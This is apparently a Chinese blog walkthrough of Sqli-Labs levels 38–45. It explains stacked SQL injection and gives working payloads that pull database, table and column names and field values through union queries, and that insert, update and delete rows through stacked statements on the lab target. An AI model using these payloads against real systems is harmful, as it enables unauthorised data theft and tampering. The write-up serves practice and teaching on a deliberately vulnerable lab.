基于Sqli-Labs靶场的SQL注入-38~45关

已于 2023-01-11 02:15:33 修改
阅读量849 收藏 7
点赞数 2
分类专栏: SQL注入 文章标签: 网络安全 mysql
于 2023-01-11 02:00:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57736664/article/details/128631469
版权

目录

Less-38-堆叠注入练习1

堆叠注入讲解

爆破数据库名

爆破表名并且插入一条数据

爆破列名并且更改刚才插入的数据

爆破字段值并且删除刚才插入的数据

Less-39-堆叠注入练习2

Less-40-堆叠注入练习3

Less-41-堆叠注入练习4

Less-42-堆叠注入练习5

爆破数据库名

爆破表名

爆破列名

爆破字段值并且删除刚插入的数据

Less-43-堆叠注入练习6

Less-44-堆叠注入练习7

Less-45-堆叠注入练习8

总结

Less-38-堆叠注入练习1

        首先我们进入38关:

        可以看到页面的显示和第一关类似,我们测试一下这一关的SQL查询语句的闭合方式,输入语句:

?id=1\

        页面回显:
         可以看到闭合方式是单引号闭合。这一关大家可以使用联合注入,但是我这里主要讲一下堆叠注入。


堆叠注入讲解

        注入原理: 我们在之前进行注入的时候,都是在SQL语句对后台传输数据的地方进行修改,然后将修改的内容一并发给后台,从而达到爆破信息的目的。当然我们得到的信息也是有限的,比如我们进行查询语句,那我们只能进行查询,不能进行增、删、改等操作。也就是说我们一次进行的操作很有限。但是堆叠注入就不一样了,这种注入方法可以一次性输入很多条SQL语句,并且让后台一并执行我们输入的SQL语句,也就是可以同时进行增、删、改、查等操作了。大大增加了注入时的便利性。

        使用方法:在我们输入的语句后面加上分号表示该语句结束,之后再输入另一条语句就可以了。例如可以先写一个查询语句,之后加分号表示查询结束,再在分号后输入删除语句。这样就叫堆叠注入。

        使用前提:堆叠注入使用的条件很苛刻,会受到API以及数据库引擎,或者是权限的限制。只有当调用数据库的函数支持执行多条SQL语句的时候才可以使用。例如 mysqli_multi_query() 函数就支持多条SQL语句同时执行,而 mysqli_query() 函数就不支持。在实际应用中,大多数都使用的是 mysqli_query() 函数,所以能使用堆叠注入的说明该网站做的很不成功,因为堆叠注入的爆破效果太好了。一般PHP搭建的网站为了防止SQL注入都会使用 mysqli_query() 函数。

        防御方法:尽量避免使用 mysqli_multi_query() 函数,同时后台对输入的语句要进行过滤操作。

        接下来我就进行堆叠注入的实战演练。

爆破数据库名

        输入语句:

?id=0' union select 1,database(),3 --+

        页面回显:

        可以看到成功爆破数据库名字。

爆破表名并且插入一条数据

        首先我们输入语句进行表名的爆破:

?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

        页面回显:

        可以看到成功爆破了表名。接下来就进行堆叠注入,我这里就演示一下在爆破表名的同时向第一张表 emails 中插入一条数据。 

        输入语句:

?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security';insert into emails(id,email_id) values('100','aaaaaa') --+

        这里我向 emails 表中插入 id=100;email_id=aaaaaa 的数据,我们查看一下页面回显以及后台数据库的情况:

        可以看到成功爆破了表名。接着我们查看一下数据库中插入进去数据没有:          可以看到以及插入成功了。这就是堆叠注入。

爆破列名并且更改刚才插入的数据

        刚才讲了如何插入数据,现在讲一下更新数据,我这里将刚才输入的数据更改为:id=50;email_id=sql。输入语句:

?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails';update emails set id=50,email_id='sql' where id=100 --+

        页面回显:

        可以看到成功爆破了表 emails 的列名。 

        我们看一下数据库的更新情况:  

        可以看到数据已经更新。

爆破字段值并且删除刚才插入的数据

        这次我讲一下删除语句的使用,我们就把刚才插入到表 emails 的数据删除,输入语句:

?id=0' union select 1,group_concat(id,email_id),3 from emails;delete from emails where id=50 --+

        页面回显:          可以看到页面成功爆破了表 emails 的字段值。接下来我们看一下数据库的情况:
         可以看到我们刚才插入的数据已经被删除了。

        这里我们看一下这一关的源代码:

        可以看到是用 mysqli_multi_query() 函数调用sql的,所以这一关中才可以使用堆叠注入。 

        到此,38关就结束了。

Less-39-堆叠注入练习2

        这一关只是闭合方式和38关不一样,这一关的闭合方式是整型,我们看一下源码:

         可以看到闭合方式是整型。其余操作都和38关一样。这里不再赘述。

Less-40-堆叠注入练习3

        这一关只是闭合方式和38关不同,这一关的闭合方式是 ') 。只需要替换一下注入点就可以了,其余操作都和38关一样,这里不再赘述。此外这一关是没有语法报错回显的,所以判断注入点的方法要使用一下语句:

?id=2') and ('1')=('1

        如果回显id=2的用户的信息,那么注入点就是 ') ,如果依旧回显id=1的用户的信息,那就需要替换为别的注入点再次测试。这种方法之前的博客也讲过。 

Less-41-堆叠注入练习4

        这一关只是闭合方式和38关不同,闭合方式是整型。其余操作都和38关一样。这里不再赘述。

Less-42-堆叠注入练习5

        进入42关:

        可以看到这一关是POST表单的形式,可以看到在该页面中还有两个跳转链接,我们点开看一下:

        可以看到这两个页面都不存在注入的可能,说明我们只能从表单下手。

        我们现在Username输入框中输入测试语句查看一下是否存在过滤情况:

1\

        页面回显:

        可以看到是一个非常不友好的页面,说明我们输入的注释符并没有起到作用,很可能是被过滤了,我们在测试一下Password输入框的情况,这次我们输入语句:

1'

        页面回显:

        可以看到虽然页面也就不友好,但是爆破出了这一关的闭合方式是单引号,闭合方式也就是注入点。那就说明我们这一关可以在Password输入框中进行注入。

        接下来使用联合注入测试一下显示位,输入语句:

1' union select 1,2,3 #

        页面回显:          可以看到我们进入了成功登录时的页面,是一个密码修改页面。同时回显出了我们的显示位。之后使用联合注入就可以。

爆破数据库名

        输入语句:

1' union select 1,database(),3 #

        页面回显:

        可以看到成功爆破了数据库名字。

爆破表名

        输入语句:

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

        页面回显:

        可以看到成功爆破了表名。

爆破列名

        输入语句:

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

        页面回显:

        可以看到成功爆破了表 emails 的列名,其余表的列名爆破方法一样,这里不在赘述。

        接下来我测试一下这一关中是否存在堆叠注入,我们向 emails 表中插入数据:id=50;email_id='abc'。

        输入语句:

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails';insert into emails(id,email_id) values(50,'abc') #

        页面回显:
         页面成功爆破了列名,接下来我们看一下数据库中是否成功插入了数据:

        可以看到成功插入了数据。当然我这是直接查看了数据库,大家也可以输入语句去通过爆破字段值的方法查看是否插入成功。

爆破字段值并且删除刚插入的数据

        输入语句:

1' union select 1,group_concat(id,email_id),3 from emails;delete from emails where id=50 #

        页面回显:

        可以看到成功爆破了表 emails 的字段值,而且此时是存在刚才插入的数据的,因为在执行查询语句之前还没有对数据进行删除,我们再次输入语句查询,看一看我们的删除是否成功:

1' union select 1,group_concat(id),3 from emails #

        这里我们只查一下有没有 id=50 的就行,页面回显:

        可以看到并没有查到 id=50 的数据,我们再去后台数据库确认一下:
 

        可以看到数据确实被删除成功。

        至此42关就结束了。 

Less-43-堆叠注入练习6

        这一关只不过SQL语句的闭合方式(注入点)变为了 ') ,其余都和42关一样,这里就不再赘述了。                 

Less-44-堆叠注入练习7

        这一关中是没有语法报错回显的,所以判断注入点有一些困难,但是只要把注入点判断出来了,其余操作就都和42关一样了。这一关在Username输入框上的处理和42关一样,都被过滤了,所以只能在Password输入框上动手脚。

        首先输入测试语句:

2' union select 1,2,3 #

        如果可以登录进入,说明注入点就找对了,这一关中就用这个作为测试注入点的方法。

        页面回显:

        可以看到成功登录进来了,说明这一关的闭合符号(注入点)就是单引号。其余操作都和42关一样,这里就不赘述了。

Less-45-堆叠注入练习8

        这一关只是SQL语句的闭合方式不同,其余都和42关一样,这一关的闭合方式(注入点)是 ') 。其余操作就不赘述了。

总结

        这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。 

Alan_Mikasan
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs(38-53)
qq_43395215的博客
08-26 832
文章目录第38:第39:第40:第41:第42:第43:第44:第45:第46:第47:第48:第49:第50:第51:第52:第53: 第38: 这一挺简单的,就一个闭合判断,就可爆数据,但是,这一的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLi Labs Less-38 堆叠注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十八请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
sqli-labs (less-38)
kukudeshuo的博客
03-14 674
sqli-labs (less-38) 进入38,输入id=1 http://127.0.0.1/sql1/Less-38/?id=1' 根据错误信息判断闭合方式为’–+,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-38/?id=-1' union select 1,2,3--+ 这里发现这难道跟less-1难道不是一模一样吗,所以这里我们不使用union注入,我们使用另一种注入方式:堆叠注入 堆叠注入攻击 堆叠查询注入攻击可以执行多条语句,多语句之间以
sqli-labs(38)
weixin_30522095的博客
06-01 182
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
SQL注入详解 38-45
君莫hacker的博客
10-15 445
目录Less-38(堆叠注入)Less-39(堆叠注入)Less-40(堆叠注入)Less-41(堆叠注入)Less-42(登录点堆叠注入)Less-43Less-44Less-45 Less-38(堆叠注入) 第38总结: 从第38开始就是堆叠注入,通过构造语句,可以对数据库进行更大的利用,若权限足够高,我们可以进行对数据库的增删改查,读取写入文件,修改各用户权限,进行更多的利用 判断注入类型 单引号字符型注入 判断注入字段数及显示位置 查看数据库名 爆表 爆列 爆数据 在38,以上的注入步
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sql-labs闯38~45
qq_44663230的博客
09-07 1704
sql-labs 38~45 堆叠注入篇
【Web安全靶场sqli-labs-master 38-53 Stacked-Injections
likinguuu的博客
02-29 1262
【Web安全靶场sqli-labs-master 38-53 Stacked-Injections
Sqli-labs less 38
weixin_34062329的博客
08-11 178
Less-38 学习了于stacked injection的相知识,我们在本可以得到直接的运用。 在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1 可以直接构造如下的payload: http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20i...
sqli-Labs————less-38
Fly_鹏程万里
05-20 987
Less-38源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tran...
sqli-labs-master靶场训练笔记(38-53|boss战)
ymy13326056686的博客
02-05 403
sqli-labs-master靶场训练笔记(38-53|boss战)
sqli-labs(38-41)
qq_43579362的博客
02-17 400
0x01 原理 堆叠注入,顾名思义就是很多语句结合在一起进行注入,在sql语句中,以;标志着一条语句的结束,要实现堆叠注入就是用;连接多条语句进行注入,即我们可以结束一个语句后,构造下一个语句。而union select也是将两条语句结合在一起一起执行,两者有何区别?区别在于联合注入只能使用查询语句,而堆叠注入可以使用任何语句,可以使用任何语句并不代表着它没有限制,它可能受到API,数据库引擎,权...
sqli-labs/Less-38
m0_71299382的博客
11-21 206
sqli-labs第三十八
sqli-labs靶场(Less-38~42)
qq_43381463的博客
01-29 107
sqli-labs靶场(Less-38~42)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Alan_Mikasan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值